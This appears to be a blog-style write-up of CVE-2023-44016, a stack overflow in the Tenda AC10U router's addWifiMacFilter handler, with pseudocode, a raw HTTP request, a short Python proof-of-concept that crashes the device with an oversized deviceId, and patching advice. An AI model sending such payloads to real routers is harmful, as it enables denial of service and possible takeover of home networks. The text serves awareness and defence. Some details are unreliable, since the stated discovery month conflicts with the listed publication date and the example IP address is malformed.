CVE-2023-44016 - Stack Overflow in Tenda AC10U via `addWifiMacFilter` – Details, Snippets, and Exploit Walkthrough

---

In October 2023, a critical vulnerability was found in the Tenda AC10U wireless router, model v1. (US_AC10UV1.RTL_V15.03.06.49_multi_TDE01). This bug, tracked as CVE-2023-44016, is a stack overflow triggered by the deviceId parameter within the addWifiMacFilter function. In simple terms, it allows hackers to crash the device or possibly execute their own code remotely – all through your router’s web admin panel.

Let’s break down what this means, see how the exploit works, and take a look at actual code snippets that highlight this serious issue.

What’s the Problem?

Stack overflow is when a program receives more information than it can handle in a specific memory region (the stack). With the Tenda AC10U, if someone sends an extremely long deviceId to the addWifiMacFilter function (which is part of the router’s management pages), that extra data can spill into memory areas it shouldn’t, letting an attacker crash the router or run malicious code.

Where is the Vulnerability?

The bug sits in the addWifiMacFilter function of the router's web server backend. When handling requests, it does not properly check how much data is put into the deviceId parameter. Here’s a simplified look at what happens (in C-like pseudocode):

void addWifiMacFilter(char* deviceId, /* ... other params ... */) {
    char buf[64]; // fixed buffer size

    // Unsafe copy without bounds checking!
    strcpy(buf, deviceId);   

    // ... rest of function ...
}

If someone sends a deviceId string longer than 64 characters (in this case), it will overwrite adjacent memory and can potentially change the flow of execution.

Exploit Details

An attacker, simply by being on your LAN (local network) or if remote access is enabled, can craft an HTTP POST request to the router’s web management interface:

POST /goform/addWifiMacFilter HTTP/1.1
Host: 192.168..1
Cookie: [sessionid_if_needed]
Content-Type: application/x-www-form-urlencoded
Content-Length: [calculated_length]

deviceId=AAAAAAAAAA...A (long string, e.g., 200 "A"s)
&otherParam1=value1
&otherParam2=value2

Replace "A...A" with a much longer string than expected (e.g., 200 or more "A" letters). The router’s software does not check this, and it writes past the allocated buffer.

Here is a quick Python snippet to send a malicious payload

import requests

url = "http://192.168..1/goform/addWifiMacFilter";
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

payload = "deviceId=" + "A"*200 + "&mac=11:22:33:44:55:66&type="
r = requests.post(url, headers=headers, data=payload)
print("Status:", r.status_code)

If the router is vulnerable and the exploit works, the router may crash, reboot, or—if followed by a more sophisticated payload—even run attacker's code.

Proof-of-Concept

Community researcher xGloomy and 360Vulcan Team first reported the bug. They published detail on GitHub, for example:

- CVE-2023-44016 disclosure on Github
- Official CVE entry

Here’s the function logic as seen in a reverse-engineered firmware binary (simplified for clarity)

void __fastcall addWifiMacFilter(http_request *req)
{
    char buf[64];
    // ...
    strcpy(buf, http_request_get_param(req, "deviceId"));
    // Stack overflow if deviceId is longer than 64 bytes!
    // ...
}

How Bad Is It?

*Low skill* attackers can use this to crash or reboot your router, breaking your internet. *Advanced* hackers could craft a payload to take control of your router and spy on/hijack your network. That makes this a critical remote code execution bug.

How to Fix?

1. Update Now: Check Tenda’s support site for firmware updates. If no patch is available, contact vendor support.
2. Restrict Access: Disable remote management, and make sure the admin page is only available from your LAN.
3. Monitor: If you suspect your router acts strange (reboots, slowdowns, unidentifiable connections), consider replacing it.

Original References

- NVD entry for CVE-2023-44016
- qsm888/tenda-router-cve on GitHub
- 360Vulcan Team's scans

Summary

CVE-2023-44016 is a dangerous, easy-to-exploit stack overflow in Tenda AC10U routers. All it takes is an oversized deviceId on the right admin page route. Patch if you can, lock down your admin pages, and stay safe online!


If you have one of these routers, prioritize securing it now. You never want to learn about network hacking the hard way!

Timeline

Published on: 09/27/2023 15:19:35 UTC
Last modified on: 09/27/2023 18:45:36 UTC